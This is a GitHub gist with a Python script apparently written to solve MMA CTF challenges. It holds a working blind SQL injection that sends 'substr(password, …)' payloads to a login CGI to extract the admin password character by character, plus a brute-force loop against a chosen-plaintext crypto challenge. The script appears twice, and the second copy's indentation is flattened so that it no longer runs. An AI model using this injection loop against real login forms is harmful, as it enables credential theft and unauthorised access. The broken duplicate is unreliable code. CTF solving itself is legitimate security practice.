shunkp/gist:8ac4d311dfd12d96d7d5

## gistfile1.txt
from urllib.request import *
from urllib.parse import *
import string

# check admin password via sql injection + substr
# return True if we are able to login (ie. character is a match), False otherwise
def challenge2(bURL, pos, char):
    headers = {}
    headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0'
    headers['Accept-Language'] = 'en-GB,en;q=0.5'
    values = {'username': 'admin\' and substr(password, {0}, 1) = \'{1}\'; - --'.format(pos,char)}
    data = urlencode(values).encode('utf-8')
    req = Request(bURL, data=data, headers=headers)
    resp = urlopen(req)
    data = resp.read().decode('utf-8')
    if len(data) <= 36:
        return True
    else:
        return False

def admin():
    start = "MMA{"
    pos = len(start)+1
    flag = False
    print('Starting string: {0}'.format(start))
    while flag == False:
        # can also use string.printable or add more symbols but this seems to be ok
        for c in string.ascii_lowercase + string.ascii_uppercase + '0123456789_}':
            resp = challenge2("http://arrive.chal.mmactf.link/login.cgi", pos,c)
            if resp == True:
                start += c
                pos += 1
                print('Letter found: {0}\nString: {1}\n'.format(c, start))
                break


def challenge(bURL, text):
    headers = {}
    headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0'
    headers['Accept-Language'] = 'en-GB,en;q=0.5'
    values = {'s': text.encode('utf-8'), '.submit': 'æå·å'}
    data = urlencode(values).encode('utf-8')
    req = Request(bURL, data=data, headers=headers)
    resp = urlopen(req)
    data = resp.read().decode('utf-8')
    try:
        sdata = data.split("</h1>")[1].split("<")[0][:-1]
    except:
        print(data)
    return sdata

def scs3(match, prefix=""):
    printable = string.ascii_lowercase + '0123456789}'
    smatch = match.split(" ")
    resp = challenge("http://bow.chal.mmactf.link/~scs/crypt6.cgi", prefix)
    print("Starting string: {0}".format(prefix))
    i = 0
    while i < len(printable):
        resp = challenge("http://bow.chal.mmactf.link/~scs/crypt6.cgi", prefix + printable[i])
        if match != resp:
            sresp = resp.split(" ")
            try:
                for x in range(2,len(smatch)):
                    if smatch[x] != sresp[x]:
                        i += 1
                        break
            except IndexError:
                prefix += printable[i]
                print("New character found {0}\nString: {1}\n".format(printable[i],prefix))
                i = 0
        else:
            print("Match found: {0}\n".format(prefix + printable[i]))
            break

if __name__ == "__main__":
    #scs3("60 00 0c 3a 1e 52 02 53 02 51 0c 5d 56 51 5a 5f 5f 5a 51 00 05 53 56 0a 5e 00 52 05 03 51 50 55 03 04 52 04 0f 0f 54 52 57 03 52 04 4e","MMA{e7")
    admin()
	from urllib.request import *
	from urllib.parse import *
	import string

	# check admin password via sql injection + substr
	# return True if we are able to login (ie. character is a match), False otherwise
	def challenge2(bURL, pos, char):
	headers = {}
	headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0'
	headers['Accept-Language'] = 'en-GB,en;q=0.5'
	values = {'username': 'admin\' and substr(password, {0}, 1) = \'{1}\'; - --'.format(pos,char)}
	data = urlencode(values).encode('utf-8')
	req = Request(bURL, data=data, headers=headers)
	resp = urlopen(req)
	data = resp.read().decode('utf-8')
	if len(data) <= 36:
	return True
	else:
	return False

	def admin():
	start = "MMA{"
	pos = len(start)+1
	flag = False
	print('Starting string: {0}'.format(start))
	while flag == False:
	# can also use string.printable or add more symbols but this seems to be ok
	for c in string.ascii_lowercase + string.ascii_uppercase + '0123456789_}':
	resp = challenge2("http://arrive.chal.mmactf.link/login.cgi", pos,c)
	if resp == True:
	start += c
	pos += 1
	print('Letter found: {0}\nString: {1}\n'.format(c, start))
	break


	def challenge(bURL, text):
	headers = {}
	headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0'
	headers['Accept-Language'] = 'en-GB,en;q=0.5'
	values = {'s': text.encode('utf-8'), '.submit': 'æå·å'}
	data = urlencode(values).encode('utf-8')
	req = Request(bURL, data=data, headers=headers)
	resp = urlopen(req)
	data = resp.read().decode('utf-8')
	try:
	sdata = data.split("</h1>")[1].split("<")[0][:-1]
	except:
	print(data)
	return sdata

	def scs3(match, prefix=""):
	printable = string.ascii_lowercase + '0123456789}'
	smatch = match.split(" ")
	resp = challenge("http://bow.chal.mmactf.link/~scs/crypt6.cgi", prefix)
	print("Starting string: {0}".format(prefix))
	i = 0
	while i < len(printable):
	resp = challenge("http://bow.chal.mmactf.link/~scs/crypt6.cgi", prefix + printable[i])
	if match != resp:
	sresp = resp.split(" ")
	try:
	for x in range(2,len(smatch)):
	if smatch[x] != sresp[x]:
	i += 1
	break
	except IndexError:
	prefix += printable[i]
	print("New character found {0}\nString: {1}\n".format(printable[i],prefix))
	i = 0
	else:
	print("Match found: {0}\n".format(prefix + printable[i]))
	break

	if __name__ == "__main__":
	#scs3("60 00 0c 3a 1e 52 02 53 02 51 0c 5d 56 51 5a 5f 5f 5a 51 00 05 53 56 0a 5e 00 52 05 03 51 50 55 03 04 52 04 0f 0f 54 52 57 03 52 04 4e","MMA{e7")
	admin()